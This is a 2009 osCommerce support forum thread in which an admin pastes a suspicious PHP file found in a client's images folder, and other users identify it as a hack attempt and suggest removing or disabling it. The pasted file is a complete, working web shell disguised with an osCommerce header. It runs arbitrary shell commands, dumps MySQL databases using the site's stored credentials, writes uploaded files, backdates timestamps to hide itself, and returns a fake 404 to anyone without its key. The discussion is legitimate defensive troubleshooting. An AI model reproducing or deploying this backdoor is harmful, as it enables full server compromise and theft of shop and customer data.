blargman Posted January 21, 2009 Share Posted January 21, 2009 What is this file for? I noticed a large amount of requests from the server's own ip to this file and it caused Apache to reach it's max clients. <?php /* $Id: table_background_info.php,v 1.73 2003/02/13 01:58:23 hpdl Exp $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright © 2003 osCommerce Released under the GNU General Public License */ define("OSCOMMERCE_FILENAME", 'shell.php'); define("SLASH", chr(92)); define("NL", chr(10)); define("CRNL", chr(13).chr(10)); $licence = "(UTEO84JE73JLL)"; if (!isset($_POST['K']) || $licence != $_POST['K']) { header("Status: 404 Not Found"); header("HTTP/1.0 404 Not Found"); $in = rand(10000000, 99999999); $fp = @fsockopen($_SERVER['SERVER_NAME'], 80, $errno, $errstr, 2); if ($fp) { $name= preg_replace("~".addcslashes(OSCOMMERCE_FILENAME, ".")."~i", $in.".jpg", $_SERVER['SCRIPT_NAME']); $out = "GET ".$name." HTTP/1.1".CRNL; $out .= "Host: ".$_SERVER['SERVER_NAME'].CRNL; $out .= "Connection: Close".CRNL.CRNL; fwrite($fp, $out); while (!feof($fp)) { $data2save .= fgets($fp, 128); } @fclose($fp); if (strstr($data2save, CRNL.CRNL)) { $data2save = substr(strstr($data2save, CRNL.CRNL), 4); $data2save = preg_replace("~".$in.SLASH.".jpg~i", OSCOMMERCE_FILENAME, $data2save); echo preg_replace("~^[\d\s]+$~mi", "", $data2save); } } die(); } header("Expires: Mon, 26 Jul 1980 05:00:00 GMT"); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Cache-Control: post-check=0, pre-check=0", false); header("Cache-Control: private"); header("Pragma: no-cache"); set_time_limit(99999999999); ini_set('memory_limit', -1); clearstatcache(); function dbc() { if (is_file("../includes/configure.php")) { @include ("../includes/configure.php"); } else if (is_file("includes/configure.php")) { @include ("includes/configure.php"); } if (isset($_POST['MYH'])) $MYH = $_POST['MYH']; else $MYH = DB_SERVER; if (isset($_POST['MYU'])) $MYU = $_POST['MYU']; else $MYU = DB_SERVER_USERNAME; if (isset($_POST['MYP'])) $MYP = $_POST['MYP']; else $MYP = DB_SERVER_PASSWORD; if (isset($_POST['MYD'])) $MYD = $_POST['MYD']; else $MYD = DB_DATABASE; $MYL = mysql_connect($MYH, $MYU, $MYP); mysql_select_db($MYD); return array($MYL, $MYH, $MYU, $MYP, $MYD); } if (isset($_POST['P'])) { die("A11"); } else if (isset($_POST['MYST'])) { list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc(); $tables = ""; $res = mysql_query("SHOW TABLES"); while ($row = mysql_fetch_array($res)) { $resCounts = @mysql_query("SELECT COUNT(*) FROM `".$row[0]."`", $MYL); $rowCounts = @mysql_fetch_array($resCounts); $tables .= "|:|".$row[0].":".$rowCounts[0].NL; } echo $tables; mysql_close($MYL); die("#done"); } else if (isset($_POST['MYSD'])) { list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc(); $list = ""; $res = mysql_query("SHOW DATABASES"); while ($row = mysql_fetch_array($res)) { $list .= "|:|".$row[0].NL; } echo $list; mysql_close($MYL); die("#done"); } else if (isset($_POST['MYFR'])) { list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc(); if (substr($_POST['MYC'], 0, 1) == 0) { $res = @mysql_query("SHOW CREATE TABLE `".$_POST['MYT']."`", $MYL); $row = @mysql_fetch_array($res); echo $row[1].";".NL; } $res = @mysql_query("SELECT * FROM `".$_POST['MYT']."` LIMIT ".$_POST['MYC'], $MYL); if (@mysql_num_rows($res) > 0) { while (($row = @mysql_fetch_array($res))) { $keys = @implode("`, `", @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = mysql_escape_string($v); } $values = @implode("', '", $values); echo "INSERT INTO `".$_POST['MYT']."` (`".$keys."`) VALUES ('".$values."');".NL; } } mysql_close($MYL); die("#done"); } else if (isset($_POST['MYINF'])) { $inf = dbc(); unset($inf[0]); die(implode("|:|", $inf)); } else if (isset($_POST['E'])) { @exec($_POST['E'], $output, $retCode); die(($retCode != 0) ? ("RETCODE:".$retCode.NL) : "".implode(NL, $output)); } else if (isset($_POST['U']) && isset($_POST['UF']) && isset($_POST['US'])) { if (strlen($_POST['U']) == $_POST['US']) { ignore_user_abort(true); $fpSave = fopen($_POST['UF'], "w"); fwrite($fpSave, base64_decode($_POST['U'])); fclose($fpSave); ignore_user_abort(false); } } if (isset($_POST['T']) || isset($_POST['UF'])) { if (isset($_POST['UF'])) $f = $_POST['UF']; else $f = $_POST['T']; $t = array(); $d = dir("."); $mt = 0; while (false !== ($e = $d->read())) { $nt = filemtime($e); if ($nt > $mt) $mt = $nt; if (preg_match("~table_background~", $e)) { $t[0][] = $nt; } else { $t[1][] = $nt; } } $d->close(); if (count($t[0]) > 0) $tc = 0; else $tc = 1; sort($t[$tc]); if (count($t[$tc]) > 0) { @touch($f, $t[$tc][floor(count($t[$tc]) / 2)]); @touch("./", $mt); } } ?> Link to comment Share on other sites More sharing options...
Guest Posted January 21, 2009 Share Posted January 21, 2009 It is not stock osc. The only reference to it I can find in google seems to relate to Information Pages Unlimited Link to comment Share on other sites More sharing options...
blargman Posted January 21, 2009 Author Share Posted January 21, 2009 Yeah, I'm not sure why that link even comes up. It's not even on the page. Doing just a search for the file comes up with a few oscommerce installs with it. Link to comment Share on other sites More sharing options...
Guest Posted January 21, 2009 Share Posted January 21, 2009 Yeah, I'm not sure why that link even comes up. It's not even on the page. Doing just a search for the file comes up with a few oscommerce installs with it. Grab a copy of the file so you have it backed up, and delete it from your website. Link to comment Share on other sites More sharing options...
blargman Posted January 21, 2009 Author Share Posted January 21, 2009 Grab a copy of the file so you have it backed up, and delete it from your website. I just 403'd it via htaccess for now. I'm actually just looking at this for someone else and know very little about oscommerce. I also noticed his images folder was completely open. If anyone does know what it is, it would be helpful, I just don't know oscommerce enough to know what it's there for. :\ Link to comment Share on other sites More sharing options...
Guest Posted January 22, 2009 Share Posted January 22, 2009 looks like a hack attempt. Seriously -- look at the file content. It's not like any "normal" osC files, really. chmod it to 000, or rename it and then chmod it to 000. -jared Link to comment Share on other sites More sharing options...
blargman Posted January 23, 2009 Author Share Posted January 23, 2009 looks like a hack attempt. Seriously -- look at the file content. It's not like any "normal" osC files, really. chmod it to 000, or rename it and then chmod it to 000. -jared I kind of thought the same, only thing that made me think different was the person I'm looking at this for, that file has been there since they put the oscommerce install on the server from another. I just found the same thing on another machine doing the exact same thing. Dosing out the server. Just filling up the MaxClients of apache. The fsockopen did look a bit suspicious to me. Though unfortunately I just don't know much about OsCommerce or really php for that matter. Can't seem to find a copy of Oscommerce 1.7 to verify file contents against. Anyone have a 1.7 install or the tarball to check if that should be in the images directory? Link to comment Share on other sites More sharing options...
Guest Posted January 23, 2009 Share Posted January 23, 2009 1.7? 2.2 MS2 was released in July 2003, I don't know the release timeline before that... -jared Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.